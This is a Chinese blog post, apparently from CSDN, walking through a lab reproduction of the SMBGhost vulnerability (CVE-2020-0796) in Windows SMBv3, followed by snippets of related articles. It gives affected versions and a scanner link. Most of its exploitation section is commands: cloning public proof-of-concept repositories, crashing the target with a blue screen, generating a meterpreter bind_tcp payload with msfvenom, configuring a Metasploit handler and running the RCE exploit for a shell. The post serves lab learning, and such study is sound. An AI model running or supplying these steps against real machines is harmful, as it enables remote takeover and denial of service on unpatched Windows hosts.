CVE-2020-0796漏洞复现

最新推荐文章于 2024-07-25 09:58:57 发布
最新推荐文章于 2024-07-25 09:58:57 发布
阅读量229 收藏 3
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63960760/article/details/132545929
版权

一、漏洞介绍

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

二、漏洞影响版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
只影响 SMB v3.1.119031909

三、漏洞复现

(1)实验环境

靶机:win10   192.168.3.138
攻击机:kali  192.168.3.128
记得关闭防火墙!

(2)检测漏洞

使用cve-2020-0796漏洞检测工具进行检测
检测当前win10操作系统是否存在漏洞
奇安信检测脚本:
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
使用cmd 运行 检测程序
输入靶机的地址(也可以是ip范围)
进行检测、
靶机存在cve-2020-0796漏洞
image.png

(3)漏洞利用

靶机蓝屏

在攻击机kali中下载蓝屏exp

git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git

下载完成后 进入exp目录
image.png
使用命令 将setup.py安装

python3 setup.py install

安装完成后
使用CVE-2020-0796.py 进行攻击

python3 CVE-2020-0796.py 192.168.3.138

成功蓝屏
image.png

反弹shell

使用msf生成payload

msfvenom -p windows/x64/meterpreter/bind_tcp lport=8888 -f py -o 1111.py

生成文件名为1111.py

下载远程RCE执行exp
地址:https://github.com/chompie1337/SMBGhost_RCE_PoC
将生成的1111.py中的内容复制
替换掉 exploit.py文件中的USER_PAYLOAD参数
并将buf参数替换为USER_PAYLOAD
image.png

之后将整个exp文件夹复制到kali中
image.png

启动msf
设置payload lport rhost参数的值

msf
use exploit/mutli/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rport 192.168.3.138  //win10的IP地址
run

msf监听8888端口

另起一个会话
运行exploit.py 脚本

python3 exploit.py -ip 192.168.3.138

image.png
msf监听到会话
image.png
复现成功

四、参考文章

https://blog.csdn.net/weixin_42742658/article/details/120564824

别忘跟我玩
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞
曹振国的博客
07-26 1998
文章目录一、漏洞简介:二、影响版本:三、实验环境:四、漏洞复现1.下载CVE-2020-0796漏洞扫描工具,对网段进行扫描2.蓝屏复现3.远程执行复现 一、漏洞简介: 3月12日,微软更新安全通告针对Windows SMBv3客户端/服务器远程代码执行漏洞紧急发布了安全补丁,确定该漏洞编号为CVE-2020-0796Microsoft Server Message Block 3.1.1(SMBv3)协议在处理某些请求的方式中存在代码执行漏洞。攻击者可以精心构造数据包发送到SMB服务器,无需经过身份
漏洞复现】Windows SMB远程代码执行漏洞CVE-2020-0796
jennycisp的博客
09-11 385
2020年3月10日,微软在其官方SRC发布了CVE-2020-0796安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码
CVE-2020-0796(永恒之黑)漏洞-章结
weixin_51706044的博客
06-19 855
文章目录一、原理二、工具下载需要使用到的工具靶机信息提权 一、原理 漏洞原理: SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。 Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行
SMB服务远程代码执行漏洞CVE-2020-0796)加固指南
乐大厨串串香飘万里
10-24 2995
1SMB服务远程代码执行漏洞CVE-2020-0796)高Windows。
cve-2020-0796_漏洞分析视角下的CVE20200796漏洞
weixin_40008870的博客
11-23 612
1概述2020年3月10日是微软补丁日,安全社区注意到Microsoft发布并立即删除了有关CVE-2020-0796的信息;2020年3月11日早上,Microsoft发布了可纠正SMBv3协议如何处理特制请求的修补程序;2020年03月12日微软发布安全公告声称Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在远程执行代码漏洞。成功利用此漏洞...
CVE-2020-0796 漏洞复现
迷风小白
06-05 3222
0x00 漏洞介绍 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。 0x01
Windows-SMB-Ghost-CVE-2020-0796漏洞分析1
08-03
【Windows SMB Ghost (CVE-2020-0796)漏洞分析】 Windows SMB Ghost漏洞,也称为CVE-2020-0796,是2020年3月微软在其官方SRC(Security Response Center)发布的一个安全公告中所描述的重大安全问题。这个漏洞存在...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-0796 SMB远程代码执行漏洞(分析、验证及加固)
Adminxe的博客
06-14 5029
0x00 前言 最近一段时间一直忙,挺火的CVE-2020-0796 (永恒之黑)都没来的及复现,今天趁着网快,赶快把漏洞系统下载下,并且准备了 检测 payload 、蓝屏 payload 、提权payload、命令执行payload,复现一波,相比起来,只是payload不同而已,来实现不同的功能,下面进行分析。 0x01 漏洞描述 漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远...
CVE-2020-0796 SMB远程代码执行漏洞 分析、验证及加固
Adminxe的博客
05-15 8939
0x01漏洞描述 CVE-2020-0796是存在于微软服务器SMB协议中的一个“蠕虫化”漏洞,该漏洞未包含 在微软本月发布的补丁中,是在补丁的序言中泄露的。目前微软尚未发布任何技术详情,思科Talos团队和Fortinet公司提供了简短概述,目前尚不清楚该漏洞的补丁何时发布。 Fortinet公司指出,该漏洞是“微软 SMB 服务器中的一个缓冲区溢出漏洞”,严重等级为最高评分,“该漏洞由易...
漏洞复现CVE-2020-0796永恒之黑漏洞复现
weixin_67698311的博客
06-18 2405
Windows 10 和Windows Server 2016引入了SMB 3.1.1.本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。3.使用工具检查靶机是否存在漏洞,检查工具下载地址https://github.com/ollypwn/SMBGhost运行结果如下图,证明靶机存在漏洞,Vulnerable代表目标存在漏洞,可以进行攻击!4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务。
SMB-2
H2SO2的专栏
05-14 1334
Samba服务工作原理Samba服务工作原理Samba服务的具体工作过程如图所示。① 首先客户端发送一个SMB negprot请求数据报,并列出它所支持的所有SMB协议版本。服务器收到请求信息后响应请求,并列出希望使用的协议版本。如果没有可使用的协议版本则返回0XFFFFH,结束通信。② 协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SesssetupX请求
网络安全学习day6——永恒之黑漏洞复现
weixin_55123346的博客
01-15 1277
永恒之黑漏洞复现
CVE-2020-0796
m_de_g的博客
10-08 6608
CVE-2020-0796(永恒之黑) 一.对应出现的版本 永恒之黑的对象为采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。 原理为由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 首先下载 CVE-2020
科普文:Linux系统安全加固指南
最新发布
为无为,事无事,味无味。
07-25 1122
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
cve-2020-9484 漏洞复现
08-09
CVE-2020-9484是Apache Tomcat容器中的一种身份验证绕过漏洞。要复现漏洞,我们需要满足以下条件: 1. 安装Apache Tomcat服务器:首先需要在本地或远程环境中安装Apache Tomcat服务器。确保Tomcat版本为9.0.0.M1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值